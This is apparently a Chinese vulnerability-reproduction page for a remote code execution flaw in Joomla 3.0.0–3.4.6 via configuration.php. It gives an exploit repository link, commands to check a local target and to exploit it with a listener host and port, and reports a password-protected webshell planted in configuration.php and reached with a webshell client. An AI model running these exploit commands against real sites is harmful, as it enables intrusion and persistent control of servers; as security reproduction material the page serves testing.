005-Joomla 3.4.6 configuration.php 远程代码执行

# Joomla 3.4.6 configuration.php 远程代码执行

### 一、漏洞简介

Joomla 3.4.6 – ‘configuration.php’ Remote Code Execution

### 二、影响范围

Joomla 3.0.0 至 3.4.6

### 三、复现过程

`https://github.com/ianxtianxt/Joomla-3.4.6—configuration.php-Remote-Code-Execution`

**脚本验证**

验证:

“`bash
python3 test.py -t http://127.0.0.1:8080/
“`

![](/static/lingzu/images/15890750081551.png)

显示“Vulnerable”证明存在漏洞

利用:

“`bash
python3 test.py -t http://127.0.0.1:8080/ –exploit –lhost 192.168.31.126 –lport 2121
“`

![](/static/lingzu/images/15890750204211.png)

执行成功

并在`“configuration.php”`写入随机密码的一句话木马

![](/static/lingzu/images/15890750314952.png)

上图的密码为:`kyevgbxjmwivdvegohfzwuukuzswxqquthlrsollpxzgiifumi`

蚁剑链接测试

![](/static/lingzu/images/15890750456274.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容